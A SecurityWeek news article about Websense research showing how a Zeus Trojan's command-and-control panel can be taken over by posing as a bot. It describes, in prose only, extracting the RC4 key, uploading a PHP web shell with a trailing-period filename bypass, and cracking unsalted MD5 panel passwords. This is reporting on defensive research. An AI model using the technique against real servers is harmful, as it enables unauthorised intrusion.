Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Malware & Threats

Zeus Malware Control Panel Vulnerable: Websense

Researchers at Websense revealed details of how to turn the tables on the purveyors of a Zeus Trojan circulating cyberspace by compromising the control panel of the malware’s command and control server (C&C).

Researchers at Websense revealed details of how to turn the tables on the purveyors of a Zeus Trojan circulating cyberspace by compromising the control panel of the malware’s command and control server (C&C).

As part of their proof-of-concept, Websense set up a command and control server in an internal research network that replicated deployments used by cybercriminals in the wild. According to Websense, Zeus 2.0.8.9 was used in the experiment, but researchers believe the same issue is present in other versions as well. 

Zeus bots, explained Websense researcher Abel Toro, operate in the following way: first, they infect a system; second, they gather credential and personally-identifiable information; and thirdly, they upload the stolen data to the command and control server in the form of reports.

ZeuS Control Panel

“The crucial point here is that the bot uploads some file to the remote server,” he blogged. “What if we could leverage this mechanism to impersonate a bot and upload our own file to the server? Let’s say an executable, with which we could execute commands on the server.”

“Unfortunately,” he continued, “we can’t just simply upload a file. Zeus uses an RC4 algorithm to encrypt all communications between the bot and the server, so it will only accept files if they are encrypted with the same key that the server uses. Luckily for us, RC4 is a symmetric cipher, which means that both parties (in this case the bot and the C&C) use the same pre-shared key. This further implies that the key is embedded somewhere in the bot. So we need to capture a Zeus binary and find the keys in order to be able to communicate with the C&C. We can achieve this by using the Volatility memory analysis tool to dump the RC4 keystream from an infected machine’s memory.”

After obtaining the key, the researchers turned their focus to using it for encrypting the file they wanted to upload in order to impersonate a bot trying to upload a report. However, the command and control server would want to make sure only valid reports are uploaded.

“We know that the C&C is using .php files, therefore, we will try to upload a php file too, which will be executed on the server side by the PHP interpreter,” he blogged. “But, the server won’t let us upload .php files. However, there is a vulnerability in the C&C’s code and a well-known technique to bypass the checks they are performing on uploaded files.

One of the most widely used bypass methods, he noted, is to add a period after filename.php (filename.php.).

Advertisement. Scroll to continue reading.

“The PHP interpreter is quite liberal, and it will interpret it as a valid php file,” he blogged. “With PHP we could execute a number of commands on the server, but in our case, we would like to get access to the control panel, so we will use a PHP web-shell, which will allow us to browse the filesystem, interact with the backend database, and (possibly, depending on the server configuration) execute system commands.”

“Now, we have everything we need to compromise the C&C server: the RC4 key, the file we want to upload (web-shell), and a way to bypass the checks,” he added. “By default, Zeus C&C’s use gate.php to receive the reports, and they will store these reports in C&C’s IP/_reports/files/BOTNET_ID/BOTID/ directory. Since we are impersonating a bot, we control both the BOTNET_ID and BOTID values, so we can predict where our uploaded file will end up. All we have to do after uploading our file is to browse to this location and our code will be executed.”

The shell enabled the researchers to browser files with important information about the particular Zeus command and control server and to interact with the backend database, Toro blogged.

In order to gain access to the control panel, the password for it had to be stolen from the database, which in Websense’s test was password-protected as well. Because the bot needs to interact with the database however, the credentials are stored in one of the configuration files of the bot (config.php under /system/directory). Once inside the database, the researchers accessed a table used for storing information about the control panel user, such as their username and hashed password.

“Zeus stores these passwords using a simple MD5 hash without any salting, thus they are relatively easy to crack,” Toro blogged. “Another option would be – since we have full read/write access to the database – to create our own password, hash it with MD5, and insert that into the database instead of the current password. Now, we will try to crack the password, hoping that it is not a very strong one.”

Once the password was cracked, the researchers had full access to the control panel.

The experiment shows that while Zeus may be regarded as an advanced banking Trojan by some, it is far perfect, Toro added.

Written By

Marketing professional with a background in journalism and a focus on IT security.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Malware & Threats

The NSA and FBI warn that a Chinese state-sponsored APT called BlackTech is hacking into network edge devices and using firmware implants to silently...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Cyberwarfare

An engineer recruited by intelligence services reportedly used a water pump to deliver Stuxnet, which reportedly cost $1-2 billion to develop.

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.

Malware & Threats

Apple’s cat-and-mouse struggles with zero-day exploits on its flagship iOS platform is showing no signs of slowing down.

Cybercrime

No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.